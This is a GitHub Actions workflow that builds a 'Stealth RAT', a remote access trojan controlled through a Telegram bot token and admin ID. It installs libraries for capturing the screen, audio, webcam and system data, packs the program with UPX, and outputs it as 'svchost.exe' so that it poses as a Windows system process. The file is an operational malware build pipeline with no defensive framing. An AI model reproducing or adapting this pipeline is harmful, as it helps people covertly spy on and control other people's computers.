# .github/workflows/build_stealth.yml
name: Build Stealth RAT

on:
  workflow_dispatch:
    inputs:
      token:
        description: 'Bot Token'
        required: true
        type: string
      admin_id:
        description: 'Admin ID'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.10'
      
      - name: Checkout code
        uses: actions/checkout@v4
      
      - name: Install dependencies
        run: |
          pip install pyinstaller
          pip install python-telegram-bot==13.15 pillow psutil requests sounddevice soundfile cryptography opencv-python numpy pycaw comtypes gputil win10toast
      
      - name: Install MinGW and UPX
        run: |
          choco install mingw -y
          choco install upx -y
      
      - name: Build Stealth RAT
        run: |
          python build.py "${{ inputs.token }}" "${{ inputs.admin_id }}"
      
      - name: Upload EXE
        uses: actions/upload-artifact@v4
        with:
          name: Rat_Stealth
          path: svchost.exe
          retention-days: 1
      
      - name: Upload debug info
        uses: actions/upload-artifact@v4
        with:
          name: Debug_Info
          path: |
            payload.exe
            payload.dll
            key.txt
          retention-days: 1
